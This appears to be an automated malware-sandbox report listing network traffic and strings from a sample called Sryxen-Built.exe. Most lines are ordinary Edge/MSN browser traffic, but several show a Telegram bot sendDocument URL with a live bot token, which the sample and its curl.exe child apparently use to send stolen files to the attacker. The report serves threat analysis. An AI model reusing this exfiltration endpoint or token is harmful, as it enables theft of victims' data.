https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=7F8F53D427D648059CF06719C9A45F3F.RefC=2025-03-08T23:52:34Z; USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; MUIDB=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1 |
Source: global traffic | HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8 |
Source: global traffic | HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.4fa8815283fe3d88a934.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8 |
Source: global traffic | HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.a1e626d952b002612af0.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8 |
Source: global traffic | HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.c64f021441815c638c7a.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8 |
Source: global traffic | HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1 |
Source: global traffic | HTTP traffic detected: GET /c.gif?rnd=1741477966956&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=7f8f53d427d648059cf06719c9a45f3f&activityId=7f8f53d427d648059cf06719c9a45f3f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1 |
Source: global traffic | HTTP traffic detected: GET /b?rn=1741477966956&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=30F2568B099669BF2FA4432208F968D1&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8 |
Source: global traffic | HTTP traffic detected: GET /b2?rn=1741477966956&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=30F2568B099669BF2FA4432208F968D1&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=14Bcf338d98fb49ffa4de591741477967; XID=14Bcf338d98fb49ffa4de591741477967 |
Source: global traffic | HTTP traffic detected: GET /c.gif?rnd=1741477966956&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=7f8f53d427d648059cf06719c9a45f3f&activityId=7f8f53d427d648059cf06719c9a45f3f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=8CA0B8253F8443F78B148C9D4843A7AE&MUID=30F2568B099669BF2FA4432208F968D1 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1; SM=T |
Source: global traffic | HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.25sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 500sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=7F8F53D427D648059CF06719C9A45F3F.RefC=2025-03-08T23:52:34Z; USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; MUIDB=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=bba57e98-dec4-4122-92ef-c5d3b18d1008; ai_session=f0dMqmqQt01IQWgwiDeg+v|1741477966952|1741477966952; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=7F8F53D427D648059CF06719C9A45F3F.RefC=2025-03-08T23:52:34Z |
Source: global traffic | HTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":16,"imageId":"BB1msFQA","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=7F8F53D427D648059CF06719C9A45F3F.RefC=2025-03-08T23:52:34Z; USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; MUIDB=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=bba57e98-dec4-4122-92ef-c5d3b18d1008; ai_session=f0dMqmqQt01IQWgwiDeg+v|1741477966952|1741477966952; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=7F8F53D427D648059CF06719C9A45F3F.RefC=2025-03-08T23:52:34Z |
Source: Sryxen-Built.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z |
Source: Sryxen-Built.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0 |
Source: Sryxen-Built.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0# |
Source: Sryxen-Built.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0# |
Source: Sryxen-Built.exe | String found in binary or memory: http://ocsp.sectigo.com0 |
Source: 8uliCbB.db.0.dr | String found in binary or memory: https://ac.ecosia.org?q= |
Source: curl.exe, 00000009.00000002.1440413944.00000243B3790000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1440413944.00000243B37AE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1440413944.00000243B3798000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument |
Source: curl.exe, 00000009.00000002.1440413944.00000243B37AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument1b |
Source: curl.exe, 00000009.00000002.1440413944.00000243B37AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument=b |
Source: curl.exe, 00000009.00000002.1440413944.00000243B3790000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentC: |
Source: Sryxen-Built.exe, 00000000.00000002.1676255001.00000273002AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentateteYO |
Source: Sryxen-Built.exe, 00000000.00000002.1676255001.00000273002D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentlC: |
Source: Sryxen-Built.exe, 00000000.00000002.1676028553.000002730010B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentp-AliveDa |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://assets.msn.cn/resolver/ |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://assets.msn.com/resolver/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://bard.google.com/ |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://bit.ly/wb-precache |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://browser.events.data.msn.cn/ |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://browser.events.data.msn.com/ |
Source: Reporting and NEL0.6.dr | String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://c.msn.com/ |
Source: 8uliCbB.db.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: offscreendocument_main.js.6.dr, service_worker_bin_prod.js.6.dr | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/ |
Source: Sryxen-Built.exe, 00000000.00000003.1331742804.00000273002B8000.00000004.00000020.00020000.00000000.sdmp, 8uliCbB.db.0.dr, Web Data.6.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: Sryxen-Built.exe, 00000000.00000003.1331742804.00000273002B8000.00000004.00000020.00020000.00000000.sdmp, 8uliCbB.db.0.dr, Web Data.6.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: Network Persistent State.6.dr | String found in binary or memory: https://chrome.cloudflare-dns.com |
Source: manifest.json.6.dr | String found in binary or memory: https://chrome.google.com/webstore/ |
Source: manifest.json.6.dr | String found in binary or memory: https://chromewebstore.google.com/ |
Source: 2154d66b-73f0-4c55-9892-db1deced4afc.tmp.7.dr, cd6de0c2-5689-463b-803d-f69a9acb05b0.tmp.7.dr | String found in binary or memory: https://clients2.google.com |
Source: Sryxen-Built.exe, 00000000.00000002.1676255001.00000273002AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://clients2.google.com/cr/report |
Source: manifest.json0.6.dr | String found in binary or memory: https://clients2.google.com/service/update2/crx |
Source: 2154d66b-73f0-4c55-9892-db1deced4afc.tmp.7.dr, cd6de0c2-5689-463b-803d-f69a9acb05b0.tmp.7.dr | String found in binary or memory: https://clients2.googleusercontent.com |
Source: Reporting and NEL0.6.dr | String found in binary or memory: https://deff.nelreports.net/api/report |
Source: 2cc80dabc69f58b6_0.6.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn |
Source: Reporting and NEL0.6.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw |
Source: manifest.json0.6.dr | String found in binary or memory: https://docs.google.com/ |
Source: manifest.json0.6.dr | String found in binary or memory: https://drive-autopush.corp.google.com/ |
Source: manifest.json0.6.dr | String found in binary or memory: https://drive-daily-0.corp.google.com/ |
Source: manifest.json0.6.dr | String found in binary or memory: https://drive-daily-1.corp.google.com/ |
Source: manifest.json0.6.dr | String found in binary or memory: https://drive-daily-2.corp.google.com/ |
Source: manifest.json0.6.dr | String found in binary or memory: https://drive-daily-3.corp.google.com/ |
Source: manifest.json0.6.dr | String found in binary or memory: https://drive-daily-4.corp.google.com/ |
Source: manifest.json0.6.dr | String found in binary or memory: https://drive-daily-5.corp.google.com/ |
Source: manifest.json0.6.dr | String found in binary or memory: https://drive-daily-6.corp.google.com/ |
Source: manifest.json0.6.dr | String found in binary or memory: https://drive-preprod.corp.google.com/ |
Source: manifest.json0.6.dr | String found in binary or memory: https://drive-staging.corp.google.com/ |
Source: manifest.json0.6.dr | String found in binary or memory: https://drive.google.com/ |
Source: 8uliCbB.db.0.dr, Web Data.6.dr | String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: Web Data.6.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: Sryxen-Built.exe, 00000000.00000003.1331742804.00000273002B8000.00000004.00000020.00020000.00000000.sdmp, 8uliCbB.db.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20 |
Source: 8uliCbB.db.0.dr, Web Data.6.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: 000003.log9.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit |
Source: 000003.log10.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset |
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset |
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset |
